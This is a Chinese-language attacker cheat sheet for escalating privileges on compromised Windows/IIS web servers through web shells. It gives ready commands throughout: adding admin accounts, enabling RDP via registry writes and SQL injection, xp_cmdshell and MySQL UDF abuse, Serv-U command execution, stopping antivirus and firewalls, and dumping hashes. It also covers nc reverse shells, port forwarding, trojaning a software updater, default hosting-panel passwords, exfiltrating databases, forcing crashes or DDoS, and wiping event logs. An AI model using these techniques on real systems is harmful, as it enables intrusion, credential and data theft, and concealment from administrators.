WEB提權

1.能不能執行cmd就看這個命令：net user，net不行就用net1，再不行就上傳一個net到可寫可讀目錄，執行c:\windows\temp\cookies\net1.exeuser

2.當提權成功，3389沒開的情況下，上傳開3389的vps沒成功時，試試上傳rootkit.asp ，之後使用剛提權的使用者登入進去就是system許可權，再試試一般就可以了。

3.cmd拒絕訪問的話就自己上傳一個cmd.exe 自己上傳的字尾是不限制字尾的，cmd.exe/cmd.com/cmd.txt 都可以。

4.cmd命令：systeminfo，看看有沒有KB952004、KB956572、KB970483這三個補丁，如果沒有，第一個是pr提權，第二個是巴西烤肉提權，第三個是iis6.0提權。

6.c:\windows\temp\cookies\ 這個目錄

7.找sa密碼或是root密碼，直接利用大馬的檔案搜尋功能直接搜尋，超方便！

8.cmd執行exp沒回顯的解決方法：com路徑那裡輸入exp路徑C:\RECYCLER\pr.exe，命令那裡清空(包括/c )輸入”net userjianmei daxia /add”

9.增加使用者並提升為管理員許可權之後，如果連線不上3389，上傳rootkit.asp指令碼，訪問會提示登入，用提權成功的賬號密碼登入進去就可以擁有管理員許可權了。

10.有時變態監控不讓新增使用者，可以嘗試抓管理雜湊值，上傳“PwDump7 破解當前管理密碼(hash值)”，倆個都上傳，執行PwDump7.exe就可以了，之後到網站去解密即可。

11.有時增加不上使用者，有可能是密碼過於簡單或是過於複雜，還有就是殺軟的攔截，命令 tasklist 檢視程式

12.其實星外提權只要一個可執行的檔案即可，先執行一遍cmd，之後把星外ee.exe命名為log.csv 就可以執行了。

13.用wt.asp掃出來的目錄，其中紅色的檔案可以替換成exp，執行命令時cmd那裡輸入替換的檔案路徑，下面清空雙引號加增加使用者的命令。

14.提權很無奈的時候，可以試試TV遠控，通殺內外網，穿透防火牆，很強大的。

15.當可讀可寫目錄存在空格的時候，會出現這樣的情況：’C:\Documents’ 不是內部或外部命令，也不是可執行的程式 或批處理檔案。解決辦法是利用菜刀的互動shell切換到exp路徑，如：CdC:\Documents and Settings\All Users\Application Data\Microsoft 目錄

然後再執行exp或者cmd，就不會存在上面的情況了，aspshell一般是無法跳轉目錄的～

16.有時候可以新增使用者，但是新增不到管理組，有可能是administrators改名了，net useradministrator 看下本地組成員，*administrators

17.進入伺服器，可以繼續內網滲透 這個時候可以嘗試開啟路由器 預設帳號密碼 admin admin

18.有的cmd執行很變態，asp馬裡，cmd路徑填上面，下面填：””c:\xxx\exp.exe “whoami” 記得前面加兩個雙引號，不行後面也兩個，不行就把exp的路徑放在cmd那裡，下面不變。

19.一般增加不上使用者，或是想新增增加使用者的vbs,bat,遠控小馬到伺服器的啟動項裡，用“直接使伺服器藍屏重啟的東東”這個工具可以實現，

20.執行PwDump7.exe抓雜湊值的時候，建議重定向結果到儲存為1.txt /cc:\windows\temp\cookies\PwDump7.exe >1.txt

21.菜刀執行的技巧，上傳cmd到可執行目錄，右擊cmd 虛擬終端，help 然後setp c:\windows\temp\cmd.exe 設定終端路徑為：c:\windows\temp\cmd.exe

22.當不支援aspx，或是支援但跨不了目錄的時候，可以上傳一個讀iis的vps，執行命令列出所有網站目錄，找到主站的目錄就可以跨過去了。

上傳cscript.exe到可執行目錄，接著上傳iispwd.vbs到網站根目錄，cmd命令/c “c:\windows\temp\cookies\cscript.exe”d:\web\iispwd.vbs

23.如何辨別伺服器是不是內網？ 192.168.x.x172.16.x.x 10.x.x.x

dos命令大全 

檢視版本：ver

檢視許可權：whoami

檢視配置：systeminfo

檢視使用者：netuser

檢視程式：tasklist

檢視正在執行的服務：tasklist/svc

檢視開放的所有埠：netstat -ano

查詢管理使用者名稱：query user

檢視搭建環境：ftp 127.0.0.1

檢視指定服務的路徑：scqc Mysql

新增一個使用者：net user jianmei daxia.asd /add

提升到管理許可權：net localgroup administrators jianmei /add

新增使用者並提升許可權：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

檢視制定使用者資訊：net user jianmei

檢視所有管理許可權的使用者：net localgroup administrators

加入遠端桌面使用者組：net localgroup “RemoteDesktop Users” jianmei/add

突破最大連線數：mstsc/admin /v:127.0.0.1

刪除使用者：net user jianmei /del

刪除管理員賬戶:net user administrator daxia.asd

更改系統登陸密碼：net password daxia.asd

啟用GUEST使用者：net user guest/active:yes

開啟TELNET服務：net start telnet

關閉麥咖啡：net stop “McAfeeMcShield”

關閉防火牆：net stop sharedaccess

檢視當前目錄的所有檔案：dirc:\windows\

檢視制定檔案的內容：typec:\windows\1.asp

把cmd.exe複製到c:\windows的temp目錄下並命名為cmd.txt：copyc:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt

開3389埠的命令：REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /vfDenyTSConnections /t REG_DWORD /d 0 /f

檢視補丁：dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.logKB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.logKB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i“%i”||@echo %i NotInstalled!)&del /f /q /a a.txt

SQL語句直接開啟3389

3389登陸關鍵登錄檔位置：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

其中鍵值DenyTSConnections 直接控制著3389的開啟和關閉，當該鍵值為0表示3389開啟，1則表示關閉。

而MSSQL的xp_regwrite的儲存過程可以對註冊進行修改，我們使用這點就可以簡單的修改DenyTSConnections鍵值，從而控制3389的關閉和開啟。

開啟3389的SQL語句：

syue.com/xiaohua.asp?id=100;execmaster.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\TerminalServer’,’fDenyTSConnections’,’REG_DWORD’,0;–

關閉3389的SQL語句：

syue.com/xiaohua.asp?id=100;execmaster.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\TerminalServer’,’fDenyTSConnections’,’REG_DWORD’,1;–

常見殺軟 

360tray.exe360實時保護

ZhuDongFangYu.exe360主動防禦

KSafeTray.exe 金山衛士

McAfeeMcShield.exe 麥咖啡

SafeDogUpdateCenter.exe 伺服器安全狗

windows提權中敏感目錄和敏感登錄檔的利用 

敏感目錄 目錄許可權提權用途

C:\ProgramFiles\ 預設使用者組users對該目錄擁有檢視權 可以檢視伺服器安裝的應用軟體

C:\Documentsand Settings\All Users\「開始」選單\程式 Everyone擁有檢視許可權 存放快捷方式，可以下載檔案，屬性檢視安裝路徑

C:\Documentsand Settings\All Users\Documents Everyone完全控制許可權 上傳執行cmd及exp

C:\windows\system32\inetsrv\Everyone完全控制許可權上傳執行cmd及exp

C:\windows\my.iniC:\ProgramFiles\MySQL\MySQL Server 5.0\my.ini 預設使用者組users擁有檢視許可權 安裝mysql時會將root密碼寫入該檔案

C:\windows\system32\ 預設使用者組users擁有檢視許可權 Shift後門一般是在該資料夾，可以下載後門破解密碼

C:\Documentsand Settings\All Users\「開始」選單\程式\啟動 Everyone擁有檢視許可權 可以嘗試向該目錄寫入vbs或bat，伺服器重啟後執行。

C:\RECYCLER\D:\RECYCLER\Everyone完全控制許可權回收站目錄。常用於執行cmd及exp

C:\ProgramFiles\Microsoft SQL Server\ 預設使用者組users對該目錄擁有檢視許可權 收集mssql相關資訊，有時候該目錄也存在可執行許可權

C:\ProgramFiles\MySQL\ 預設使用者組users對該目錄擁有檢視許可權 找到MYSQL目錄中user.MYD裡的root密碼

C:\oraclexe\ 預設使用者組users對該目錄擁有檢視許可權 可以嘗試利用Oracle的預設賬戶提權

C:\WINDOWS\system32\config 預設使用者組users對該目錄擁有檢視許可權 嘗試下載sam檔案進行破解提權

C:\ProgramFiles\Geme6 FTP Server\Remote Admin\Remote.ini 預設使用者組users對該目錄擁有檢視許可權 Remote.ini檔案中存放著G6FTP的密碼

c:\ProgramFiles\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ 預設使用者組users對該目錄擁有檢視許可權ServUDaemon.ini 中儲存了虛擬主機網站路徑和密碼

c:\windows\system32\inetsrv\MetaBase.xml 預設使用者組users對該目錄擁有檢視許可權 IIS配置檔案

C:tomcat5.0\conf\resin.conf 預設使用者組users對該目錄擁有檢視許可權 Tomat存放密碼的位置

C:\ZKEYS\Setup.ini 預設使用者組users對該目錄擁有檢視許可權 ZKEYS虛擬主機存放密碼的位置

提權中的敏感登錄檔位置 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\TcpMssql埠

HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer DenyTSConnections 遠端終端值為0 即為開啟

HKEY_LOCAL_MACHINE\SOFTWARE\MySQLAB\ mssql的登錄檔位置

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 華眾主機登錄檔配置位置

HKEY_LOCAL_MACHINE\SOFTWARE\CatSoft\Serv-U\Domains\1\UserList\ serv-u的使用者及密碼（su加密）位置

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp 在該登錄檔位置PortNumber的值即位3389埠值

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Serversmysql管理工具Navicat的登錄檔位置，提權運用請谷歌

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\ParametersRadmin的配置檔案，提權中常將其匯出進行進行覆蓋提權

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\ IIS登錄檔全版本洩漏使用者路徑和FTP使用者名稱漏洞

HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass 華眾主機在登錄檔中儲存的mssql、mysql等密碼

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 星外主機mssql的sa賬號密碼，雙MD5加密

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\ControlSet002 星外ftp的登錄檔位置，當然也包括ControlSet001、ControlSet003

wscript.shell的刪除和恢復 

載wscript.shell物件，在cmd下或直接執行：regsvr32 /u%windir%\system32\WSHom.Ocx

解除安裝FSO物件，在cmd下或直接執行：regsvr32.exe/u %windir%\system32\scrrun.dll

解除安裝stream物件，在cmd下或直接執行：regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll”

如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP元件，這樣子就可以用了

如何找到準確的終端連線埠？

在aspx大馬裡，點選“系統資訊”第三個就是目前的3389埠

或是執行命令檢視正在執行的服務：tasklist/svc

找到：svchost.exe1688 TermService

記住1688這個ID值，

檢視開放的所有埠：netstat-ano

找到1688這個ID值所對應的埠就是3389目前的埠

iis6提權提示Can not findwmiprvse.exe的突破方法 

突破方法一：

在IIS環境下，如果許可權做得不嚴格，我們在aspx大馬裡面是有許可權直接結束wmiprvse.exe程式的，程式檢視裡面直接K掉

在結束之後，它會再次執行，這時候的PID值的不一樣的。這時候我們回來去執行exp，直接秒殺。

突破方法二：

虛擬主機，一般許可權嚴格限制的，是沒許可權結束的，這時候我們可以考慮配合其他溢位工具讓伺服器強制重啟，比如“直接使伺服器藍屏重啟的東東”

甚至可以暴力點，DDOS秒殺之，管理發現伺服器不通了首先肯定是以為伺服器當機，等他重啟下伺服器（哪怕是IIS重啟下）同樣秒殺之。

本地溢位提權 

計算機有個地方叫快取區,程式的快取區長度是被事先設定好的,如果使用者輸入的資料超過了這個快取區的長度,那麼這個程式就會溢位了.

快取區溢位漏洞主要是由於許多軟體沒有對快取區檢查而造成的.

利用一些現成的造成溢位漏洞的exploit通過執行,把使用者從users組或其它系統使用者中提升到administrators組.

想要執行cmd命令，就要wscript.shell組建支援，或是支援aspx指令碼也行，因為aspx指令碼能呼叫.net元件來執行cmd的命令.

sa提權 

掃描開放的埠，1433開了就可以找sa密碼提權，用大馬裡的搜尋檔案功能，sa密碼一般在conn.aspconfig.asp web.config這三個檔案

也可以通過登錄檔找配置檔案，看下支援aspx不，支援的話跨目錄到別的站點上找，找到之後用aspshell自帶的sql提權登入再執行命令建立使用者即可。

aspx馬提權執行命令有點不一樣，點選資料庫管理–選MSSQL–server=localhost;UID=saWD=;database=masterrovider=SQLOLEDB–輸入帳號密碼連線即可

增加一個使用者：execmaster.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–

提升為管理員：execmaster.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–

PS:如果增加不上，說明是xp_cmdshell組建沒有，增加xp_cmdshell組建：Use masterdbcc addextendedproc(‘xp_cmdshell’,’xplog70.dll’)

root提權 

利用mysql提權的前提就是,伺服器安裝了mysql,mysql的服務沒有降權,是預設安裝以系統許可權繼承的(system許可權). 並且獲得了root的賬號密碼

如何判斷一臺windows伺服器上的mysql有沒有降權？

cmd命令net user 如果存在 mysqlmssql這樣使用者或者類似的.通常就是它的mssql mysql服務已經被降權執行了

如何判斷伺服器上是否開啟了mysql服務？

開了3306埠，有的管理員會把預設埠改掉.另一個判斷方法就是網站是否支援php,一般支援的話都是用mysql資料庫的.

如何檢視root密碼？

在mysql的安裝目錄下找到user.myd這個檔案，root就藏在裡面，一般是40位cmd加密，一些php網站安裝的時候用的是root使用者,在conn.aspconfig.asp這些檔案裡。

有時會顯得很亂，這時就需要自己去組合，前17位在第一行可以找到，還有23位在第三行或是其他行，自己繼續找。

可以直接用php指令碼里“mysql執行”，或是上傳個UDF.php，如果網站不支援PHP，可以去旁一個php的站，也可以把UDF.php上傳到別的phpshell上也可以。

填入帳號密碼之後，自然就是安裝DLL了，點選“自動安裝MysqlBackDoor” 顯示匯出跟建立函式成功後，緊接著執行增加使用者的命令即可。

注意：5.0版本以下(包括5.0的)預設c:\windows\系統目錄就可以了，5.1版本以上的不能匯出到系統目錄下建立自定義函式，只能匯出在mysql安裝目錄下的lib/plugin目錄中

例如：D:/ProgramFiles/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

如果密碼看不見，或是組合不到40位，就本地安裝一個mysql吧，

1、停止mysql服務

2、替換下載下來的3個檔案（user.MYIuser.MYD user.frm）

3、cmd切換到bin目錄下，進入mysql安全模式，cmd命令：mysqld-nt –skip-grant-tables

4、重新開啟一個cmd 切換到bin目錄下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot-proot

5、最後查詢一下就出來了selectuser,password from mysql.user;

serv-u提權 

這個檔案裡包含serv-u的md5密碼：C:\ProgramFiles\RhinoSoft.com\Serv-U\\ServUDaemon.ini

找到這個檔案：ServUDaemon.ini 開啟找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

再拿md5密文去解密，再用現在的密碼登陸提權即可。

serv-u提權的前提是43958埠開了，且知道帳號密碼！

如果帳號密碼預設，直接用shell裡面的serv-u提權功能即可搞定，建議用aspx馬、php馬去提權，因為可以看回顯。

530說明密碼不是預設的,回顯330說明成功，900說明密碼是預設的……………..

在程式裡找個快捷方式，或是相關的檔案進行下載到本地，再檢視檔案的屬性，就可以找到serv-u的安裝目錄了。

目錄有修改許可權之serv-u提權：

找到serv-u的目錄，再找到使用者的配置檔案ServUDaemon.ini，直接增加一個使用者程式碼，儲存！

接著本地cmd命令：ftp 伺服器ip

回車，輸入帳號密碼再回車………………….

接著先試試普通的cmd命令提權，不行的話就使用ftp提權的命令：

Quotesite exec net user jianmei daxia /add 增加一個使用者

Quotesite exec net localgroup administrators jianmei /add 提升到管理員許可權

200EXEC command successful (TID=33). 執行成功的回顯資訊

Maintenance=System 許可權型別多加一行指定新加帳號為系統管理員

ReloadSettings=True 在修改ini檔案後需加入此項，這時serv-u會自動重新整理配置檔案並生效

埠轉發 

什麼情況下適合轉發埠？

1.伺服器是內網，我們無法連線。

2.伺服器上有防火牆，阻斷我們的連線。

轉發埠的前提，我們是外網或是有外網伺服器。

找個可讀可寫目錄上傳lcx.exe

本地cmd命令：lcx.exe-listen 1988 4567 （監聽本地1988埠並轉發到4567埠）

接著shell命令：/cc:\windows\temp\cookies\lcx.exe -slave 本機ip 1988 伺服器ip 3389 （把伺服器3389埠轉發到本地4567埠）

之後本地連線：127.0.0.1:4567(如果不想加上:4567的話，本地執行命令的時候，把4567換成3389來執行就行了)

以上是本機外網情況下操作，接著說下在外網伺服器裡如何操作：

上傳lxc.execmd.exe到伺服器且同一目錄，執行cmd.exe命令：lcx.exe-listen 1988 4567

接著在aspxshell裡點選埠對映，遠端ip改為站點的ip，遠埠程填1988，點選對映埠，接著在伺服器裡連線127.0.0.1:4567就可以了。

nc反彈提權 

當可以執行netuser，但是不能建立使用者時，就可以用NC反彈提權試下，特別是內網伺服器，最好用NC反彈提權。

不過這種方法, 只要對方裝了防火牆, 或是遮蔽掉了除常用的那幾個埠外的所有埠，那麼這種方法也失效了….

找個可讀可寫目錄上傳nc.execmd.exe

-l 監聽本地入棧資訊

-pport開啟本地埠

-t 以telnet形式應答入棧請求

-e 程式重定向

本地cmd執行：nc -vv -l -p52 進行反彈

接著在shell裡執行命令：c:\windows\temp\nc.exe-vv 伺服器ip999 -e c:\windows\temp\cmd.exe 最好是80或8080這樣的埠，被防火牆攔截的機率小很多

執行成功後本地cmd命令：cd/ （只是習慣而已）

接著以telnet命令連線伺服器：telnet 伺服器ip 999

回車出現已選定伺服器的ip就說明成功了，接著許可權比較大了，嘗試建立使用者！

壞蛋：

本地cmd執行：nc -vv -l -p52 進行反彈

c:\windows\temp\nc.exe-e c:\windows\temp\cmd.exe 伺服器ip 52

低調小飛：

shell執行命令c:\windows\temp\nc.exe-l -p 110 -t -e c:\windows\temp\cmd.exe 

一般這樣的格式執行成功率很小，不如直接在cmd那裡輸入：c:\windows\temp\nc.exe 命令這裡輸入：-vv 伺服器ip 999 -ec:\windows\temp\cmd.exe

這個技巧成功率比上面那個大多了，不單單是nc可以這樣，pr這些提權exp也是可以的。

星外提權

如何知道是不是星外主機？

第一：網站物理路徑存在“freehost”

第二：asp馬裡點選程式，存在“7i24虛擬主機管理平臺”“星外主機”之類的資料夾

預設帳號：freehostrunat

預設密碼：fa41328538d7be36e83ae91a78a1b16f!7

freehostrunat這個使用者是安裝星外時自動建立的，已屬於administrators管理組，而且密碼不需要解密，直接登入伺服器即可

星外常寫目錄：

C:\RECYCLER\

C:\windows\temp\

e:\recycler\

f:\recycler\

C:\php\PEAR\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\SystemVolume Information

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\windows\hchiblis.ibl

C:\7i24.com\iissafe\log\

C:\7i24.com\LinkGate\log

C:\ProgramFiles\Thunder Network\Thunder7\

C:\ProgramFiles\Thunder Network\Thunder\

C:\ProgramFiles\Symantec AntiVirus\SAVRT\

c:\windows\DriverPacks\C\AM2

C:\ProgramFiles\FlashFXP\

c:\ProgramFiles\Microsoft SQL Server\90\Shared\ErrorDumps\

C:\ProgramFiles\Zend\ZendOptimizer-3.3.0\

C:\ProgramFiles\Common Files\

c:\Documentsand Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

c:\ProgramFiles\360\360Safe\deepscan\Section\mutex.db

c:\ProgramFiles\Helicon\ISAPI_Rewrite3\error.log

c:\ProgramFiles\Helicon\ISAPI_Rewrite3\Rewrite.log

c:\ProgramFiles\Helicon\ISAPI_Rewrite3\httpd.conf

c:\ProgramFiles\Common Files\Symantec Shared\Persist.bak

c:\ProgramFiles\Common Files\Symantec Shared\Validate.dat

c:\ProgramFiles\Common Files\Symantec Shared\Validate.dat

C:\ProgramFiles\Zend\ZendOptimizer-3.3.0\docs

C:\Documentsand Settings\All Users\DRM\

C:\Documentsand Settings\All Users\Application Data\McAfee\DesktopProtection

C:\Documentsand Settings\All Users\Application Data\360safe\softmgr\

C:\ProgramFiles\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

C:\Documentsand Settings\All Users\Application Data\Microsoft\Media Index\

ee提權法：

找個可讀可寫目錄上傳ee.exe

cmd命令：/cc:\windows\temp\cookies\ee.exe -i （獲取星外帳號的id值，例如回顯：FreeHost ID：724）

接著命令：/cc:\windows\temp\cookies\ee.exe -u 724 （獲取星外的帳號密碼）

vbs提權法：

找個可讀可寫目錄上傳cscript.exeiispwd.vbs

cmd命令：/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs

意思是讀取iis，這樣一來，不但可以獲取星外的帳號密碼，還可以看到同伺服器上的所有站點的目錄。

可行思路大全：

經測試以下目錄中的檔案許可權均為everyone，可以修改，可以上傳同檔名替換，刪除，最重要的是還可以執行：

360防毒db檔案替換:

c:\ProgramFiles\360\360SD\deepscan\Section\mutex.db

c:\ProgramFiles\360\360Safe\deepscan\Section\mutex.db

C:\ProgramFiles\360\360Safe\AntiSection\mutex.db

IISrewrite3 檔案替換：

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\Rewrite.log

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\httpd.conf

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\error.log

諾頓防毒檔案替換:

c:\ProgramFiles\Common Files\Symantec Shared\Persist.bak

c:\ProgramFiles\Common Files\Symantec Shared\Validate.dat

c:\ProgramFiles\Common Files\Symantec Shared\Persist.Dat

一流過濾相關目錄及檔案：

C:\7i24.com\iissafe\log\startandiischeck.txt

C:\7i24.com\iissafe\log\scanlog.htm

其他:

Zend檔案替換：C:\ProgramFiles\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

華盾檔案替換：C:\WINDOWS\hchiblis.ibl

Flash檔案替換：C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx

DUMeter流量統計資訊日誌檔案替換：c:\Documentsand Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

360提權

找個可讀可寫目錄上傳360.exe

cmd命令：/cc:\windows\temp\cookies\360.exe

會提示3段英文：

360Antivirus Privilege Escalation Exploit By friddy 2010.2.2

Youwill get a Shift5 door!

Shift5Backdoor created!

這是成功的徵兆，接著連線伺服器連按5下shift鍵，將彈出工作管理員，點選新建任務：explorer.exe 會出現桌面，接下來大家都會弄了……

搜狗提權

搜狗的目錄預設是可讀可寫的，搜狗每隔一段時間就會自動升級，而升級的檔案是pinyinup.exe

我們只要把這個檔案替換為自己的遠控木馬，或是新增賬戶的批處理，等搜狗升級的時候，就可以達成我們的目的了。

華眾虛擬主機提權

就經驗來說，一般溢位提權對虛擬主機是無果的，而且華眾又沒有星外那麼明顯的漏洞。

所以華眾提權關鍵之處就是蒐集資訊，主要登錄檔位置：

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpassroot密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpsssa 密碼

c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有使用者名稱和密碼

以上資訊配合hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具使用

百度搜尋：hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具

N點虛擬主機 

N點虛擬主機管理系統預設資料庫地址為：\host_date\#host# date#.mdb

rl直接輸入不行 這裡我們們替換下 #=%23 空格=%20

修改後的下載地址為/host_date/%23host%20%23%20date%23196.mdb

N點資料庫下載之後找到sitehost表 FTPuser&FTPpass 值 FTPpass是N點加密資料然後用N點解密工具解密得到FTP密碼

N點預設安裝路徑C:\ProgramFiles\NpointSoft\npointhost\web\

D:\ProgramFiles\NpointSoft\npointhost\web\

預設許可權可讀。遇到對方所用虛擬主機是N點時候 可以考慮 讀取該資料夾下載資料庫

N點解密工具程式碼

<%

setiishost=server.CreateObject(“npoint.host”)

x=iishost.Eduserpassword(“FTPpass值”,0)

response.writex

%>

本地搭建N點環境在N點目錄開啟訪問即可。得到密碼減去後10位字元即為 N點的虛擬主機管理密碼。

然後需要在管理系統登陸確認下在hostcs 表 找到 Hostip 或者hostdomain

一般預設是 Hostip=127.0.0.1hostdomain=www.npointhost.com 這裡可以不管 因為 這裡不修改的話就是伺服器預設ip地址sitehost 表的host_domain就是繫結的域名 直接查下IP地址即可 我們們批量的話 掃描的地址即可。

管理系統地址即為IP地址 選擇虛擬主機 登入即可

接下來傳shell大家應該都會了。

接下來說提權 hostcs表存有sa root賬戶的密碼 解密方法一樣。預設都是 解密結果123456

還有就是在adminlogo 存在N點系統管理密碼 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下試試 或者用asm的工具破解下我的運氣不好沒成功過

3057C0DB854C878E72756088058775 這個是預設admin的密碼

拖庫

access資料庫脫褲很簡單，直接下載資料庫即可，mssql資料庫可以用shell自帶的脫褲功能，也可以用asp脫褲指令碼，找到資料庫連線資訊的檔案，例如：web.config.asp

用帳號密碼登入asp脫褲指令碼，找到管理表，再找到會員庫（UserInfo），之後匯出即可，mysql資料庫一般用php指令碼，找網站資料連線資訊：

‘host’ => ‘localhost:3306’, 資料庫ip

‘user’ => ‘iwebs’, 使用者

‘passwd’ => ‘nnY5bvRNnJ4vKpmb’, 密碼

‘name’ => ‘iwebshop’, 資料庫名

接著上傳php脫褲指令碼，進入拖庫介面之後，左邊有一個選擇資料庫名的選項，這裡是iwebshop，選擇資料庫名之後，就會出現列表，想脫哪個就點選哪個，然後點選selectdata

Import是匯入的意思，而Export是匯出的意思，我們在拖庫，當然是選擇Export了，之後選擇save，再點選Export就開始脫褲了。

如果伺服器上安裝了phpmysql，也可以找到該頁面，用剛找到的root賬號密碼登入進去，在裡面也是可以拖庫的，如同上傳php拖庫指令碼一樣，操作差不多的。

伺服器

命令提示符已被系統管理員停用？

解決方法：執行→gpedit.msc→使用者配置→管理模板→系統，在右側找到”阻止命令提示符”, 然後雙擊一下,在”設定”裡面選中”未配置” ,最後點選”確定”。

如何判斷伺服器的型別？

解決方法：直接ping伺服器ip，看回顯資訊進行判斷

TTL=329X/ME

TTL=64linux

TTL=1282000X/XP

TTL=255UNIX

為什麼有時3389開放卻不能連線？

原因分析：有時候是因為防火牆，把3389轉發到其他埠就可以連線了，有的轉發後依然是連線不上，那是因為管理員在TCP/IP裡設定的埠限制

解決方法：我們需要把埠轉為TCP/IP裡設定的只允許連線的埠其中一個就可以了，更好的辦法是取消埠限制。

最簡單的往伺服器上傳東西方法是什麼？

本機開啟“HFS網路檔案伺服器”這款工具，把需要上傳的工具直接拖進左邊第一個框內，複製上面的地址，到伺服器裡的瀏覽器訪問，就可以下載了

限制“命令提示符”的執行許可權？

我的電腦（右鍵）–資源管理器中–點選“工具”按鈕，選擇“資料夾選項”，切換到“檢視”標籤，去掉“使用簡單檔案共享(推薦)”前面的鉤，這一步是為了讓檔案的屬性選單中顯示“安全”標籤，然後進入“c:\windows\system32\”，找到“cmd.exe”，點右鍵選擇“屬性”，切換到“安全”標籤，將其中“組或使用者名稱稱”中除了管理員外的所有使用者都刪除，完成後點“確定”這樣當普通使用者想執行“命令提示符”的時候將會出現“拒絕訪問”的警告框。

如何更改windows2003最大連線數？

windows2003中的遠端桌面功能非常方便，但是初始設定只允許2個使用者同時登陸，有些時候因為我在公司連線登陸後斷開，同事在家裡用其他使用者登陸後斷開，當我再進行連線的時候，總是報錯“終端服務超過最大連線數”這時候我和同事都不能登陸，通過以下方法來增加連線數，執行：services.msc，啟用licenselogging，別忘了新增完畢後再關閉LicenseLogging

開啟win2k3的控制皮膚中的“授權”，點“新增許可”輸入要改的連線數

如何清除伺服器裡的IP記錄日誌？

1.我的電腦右鍵管理–事件檢視器–安全性–右鍵清除所有事件

2.開啟我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕

3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕